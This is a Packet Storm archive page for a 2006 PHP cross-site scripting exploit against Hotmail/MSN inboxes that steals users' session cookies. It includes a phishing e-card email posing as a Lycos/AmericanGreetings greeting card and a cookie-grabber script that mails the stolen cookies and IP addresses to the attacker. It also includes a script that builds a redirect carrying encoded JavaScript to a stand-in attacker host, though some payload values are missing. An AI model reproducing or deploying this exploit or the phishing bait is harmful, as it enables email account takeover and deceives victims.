what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Feb 26, 2006
Authored by Simo64

Hotmail/MSN cross site scripting exploit.

tags | exploit, xss
SHA-256 | 7ee723fd6bda6975447f5281a29e4b67559ae75d79a168fe927bfc0c9b56085f


Change Mirror Download
/* Hotmail/MSN Cross Site Scripting Exploit

Author: Simo Ben youssef aka _6mO_HaCk
Contact: Simo_at_morx_dot_org
Discovered: September 15 2005
Published: February 20 2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt
Morx Security Research Team


Exploit written in PHP to exploit the $a variable cross site scripting
vulnerability inside Hotmail/MSN inbox. Exploit requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering skills are required too

Notice: if you dont know what's cross site scripting or/and how its being
exploited then just stop reading by here as you will have to modify some
things on the exploit to make it work for you, but if you insist then good


Exploiting this flaw seemed to be almost impossible on Internet Explorer
Browsers, because the vulnerable variable resides inside the hotmail inbox
and its value has to be correct and we cant avoid it, replace it or guess
it in anyway, at this point it was ok while it was possible to get the
victim click on the url and grab the entire HTTP referrer add our
malicious code at the end of the variable value and redirect the victim
back to the HTTP referrer with one single script, this worked just fine on
firefox while it didnt work on IE beacause hotmail filters <a href=""> and
replace it with javascript:ol(); so the link opens a new internet explorer
window, and of course when IE opens another window it doesnt send the HTTP
referrer where from the link was opened previously, so one way to exploit
this was to insert an <img src=""> and make it point to a php script
in order to grab the HTTP referrer of the victim, reconstruct it, add
javascript code at the end of the $a variable value and then open another
php script in the same server and write on it some php code to make an
automatic redirection to the re constructed HTTP referrer when the victim
clicks on the second link, and therefore get the malicious code executed
which will grab the user authentification cookie and send it to the
attacker script giving the attacker full access to the victim inbox for 24
hours, which's the default time set in hotmail for cookie expiration :)

Exploiting this vulnerability can be done by uploading the following
script to a php enabled webserver then send an email to the victim with
<img src="http://www.attacker-server.com/a.php"> where a.php is the php
exploit file name and <a
href="http://http://www.attacker-server.com/ecard.php"> is the link of the
second script (the one that get created by a.php) as i said some Social
Engineering skills are required, so as an example the email can be sent as
a greeting card with the following HTML code, you may also need to modify
some things on the php exploit to make it fit your needs.
Hello, </p>
Jennifer has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php"> http://
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
Thanks for using Lycos Greetings with AmericanGreetings.com
<img src="http://attacker-site/a.php"></img>

as a cookie grabber you may use the following code:

$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location:

at the end i would like to say a big thanks to mat
(mattzew5_at_hotmail_dot_com) for helping me research and test this
exploit, it took several days of research to exploit this flaw, so once
again thanks mat

greets to all MorX members and especially to BlooDMASK even though he
refused to let me test this on his hotmail account, certainly thats
because he has some nice xxx passwords on it :) also greets to barbenoir
(boule7ia), th3-brain, Dragos and everybody else.

Why am i publishing this late ?

because i found better flaws in hotmail which i wont be releasing anytime
soon :)


avoid clicking on links while being autentified.


this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben
youssef ---------------------- */


/* file name of the script that's the victim will visit
make sure your webserver has writting permissions
otherwise create ecard.php manualy and chmod it to 777 or whatever */

$file = "ecard.php";

// get the http referrer that we get with <img


$host = $HTTP_REFERER;

// reconstruct the http referrer

// get the &curmbox string position

$first = strpos($host, '&curmbox');

// get the first url part based on $curmbox position

$firstpart = substr($host, 0, $first);

// get the second url part

$secondpart = substr($host, $first);

/* split the second part and list the first
two variables since hotmail dublicate those sometimes */

list($a, $b, $c) = split('[&]', $secondpart);

// put all the above together

$target = "$firstpart&$a$b&$c";

$fo = fopen($file, 'w+');

// change this to your cookie grabber address, dont include "http://" as
its already included in hex
// the variable name for the cookie grabber should be included too

$d = 'www.attacker-site.com/cookie-grabber.php?cookie';

// first javascript hex code

$e =

// second javascript hex code

$f =

// convert the cookie grabber url to hex code and add "%" at the first of
each hex caracter

$converted = bin2hex($d);

$converted = chunk_split($converted, 2, '%');

$converted = '%' . substr($converted, 0, strlen($converted) - 1);

$data = '<?php header ("Location: ' . $target . '' . $e . '' . $converted
. '' . $f .'"); ?>';

/* write the data that would redirect the victim to the reconstructed http
referrer and exploit the vulnerable variable and make the cookie
redirection */

fwrite($fo, $data);


Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By